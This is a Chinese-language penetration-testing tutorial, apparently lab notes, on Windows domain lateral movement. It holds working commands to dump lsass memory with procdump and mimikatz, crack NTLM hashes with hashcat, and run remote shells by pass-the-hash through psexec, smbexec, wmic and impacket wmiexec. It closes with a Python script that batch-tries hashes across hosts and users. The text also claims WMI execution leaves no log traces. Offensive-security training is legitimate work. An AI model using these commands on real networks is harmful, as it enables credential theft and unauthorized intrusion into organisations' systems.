内网 域横向 基于smb&wmi 明文或 hash 传递
演示案例:
Procdump+Mimikatz 配合获取
Hashcat 破解获取 Windows NTML Hash
域横向移动 SMB 服务利用-psexec,smbexec
域横向移动 WMI 服务利用-cscript,wmiexec,wmic
域横向移动以上服务 hash 批量利用-python 编译 exe
案例 1-Procdump+Mimikatz 配合获取
1.1procdump 配合 mimikatz
procdump -accepteula -ma lsass.exe lsass.dmp
生成lsass.dmp
1.2mimikatz 上执行:
privilege::debug
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
2.Pwdump7
3.QuarksPwdump
hashcat:1000 --解密hash
hashcat -a0-m 1000hash file --force
案例 2-域横向移动 SMB 服务利用-psexec,smbexec(官方自带)
利用 SMB 服务可以通过明文或 hash 传递来远程执行,条件 445 服务端口开放。
psexec,smbexec是基于SMB服务的连接,需要开启445端口,获取明文或者hash值
1.psexec 第一种:先有 ipc 链接,psexec 需要明文或 hash 传递
1)psexec传递:
第一种:建立ipc连接,明文或者hash传递,需要对方的administrator权限,否则会错误
psexec是微软官方,不会被杀:https://docs.microsoft.com/en-us/sysinternals/downloads/pstools
1.建立ipc连接:net use \\192.168.213.163\ipc$ "123.com" /user:administrator
2.使用psexec返回cmd窗口:psexec \\192.168.213.163 -s cmd
# 需要先有 ipc 链接 -s 以 System 权限运行
2.psexec 第二种:不用建立 IPC 直接提供明文账户密码
1.psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd
2.psexec -hashes :$HASH$ ./administrator@10.1.2.3
3.psexec -hashes :$HASH$ domain/administrator@10.1.2.3
4.psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
官方 Pstools 无法采用 hash 连接,用impacket 里的psexec可以用hash
3.非官方自带-参考 impacket 工具包使用,操作简单,容易被杀
-
smbexec 无需先 ipc 链接 明文或 hash 传递
这是使用impacket工具包,
exe下载地址:https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip
py版本:https://github.com/SecureAuthCorp/impacket1.smbexec god/administrator:Admin12345@192.168.3.21 2.smbexec ./administrator:admin!@#45@192.168.3.32 3.smbexec -hashes :$HASH$ ./admin@192.168.3.21 4.smbbexec -hashes :$HASH$ domain/admin@192.168.3.21 5.smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 smbexec -hashes :ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21
案例 3-域横向移动 WMI 服务利用-cscript,wmiexec,wmic
WMI(Windows Management Instrumentation) 是通过 135 端口进行利用,支持用户名明文或者 hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。
1.自带 WMIC 明文传递 无回显
建立连接,返回的值在对方主机需要进行读取: wmic /node:192.168.230.142 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >C:\1.txt"
2.自带 cscript 明文传递 有回显
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345
3.套件 impacket wmiexec
明文或 hash 传递 有回显 exe 版本,可能容易被杀
工具包地址:https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip
明文或 hash 传递 有回显 exe 版本
1.工作组环境:wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
2.域环境:wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
3.wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
4.wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"
5.查看c盘:wmiexec hsyy.com/administrator:123.com@192.168.213.163 "dir /c"
案例 4-域横向移动以上服务 hash 批量利用-python 编译 exe
py批量检测,循环账户密码,
使用python的pyinstaller模块导出exe执行
pyinstaller.exe -F fuck_neiwang_002.py
exp:
import os,time
ips={
'192.168.3.21',
'192.168.3.25',
'192.168.3.29',
'192.168.3.30',
'192.168.3.32'
}
users={
'Administrator',
'boss',
'dbadmin',
'fileadmin',
'mack',
'mary',
'webadmin'
}
hashs={
'ccef208c6485269c20db2cad21734fe7',
'518b98ad4178a53695dc997aa02d455c'
}
for ip in ips:
for user in users:
for mimahash in hashs:
#wmiexec -hashes :hashgod/user@ipwhoami
exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"
print('--->' + exec + '<---')
os.system(exec)
time.sleep(0.5)
涉及资源:
https://github.com/hashcat/hashcat
https://www.freebuf.com/sectool/164507.html
https://github.com/gentilkiwi/mimikatz/releases
https://github.com/SecureAuthCorp/impacket
https://gitee.com/RichChigga/impacket-examples-windows
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
https://docs.microsoft.com/zh-
cn/sysinternals/downloads/procdump
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw 提取码:xiao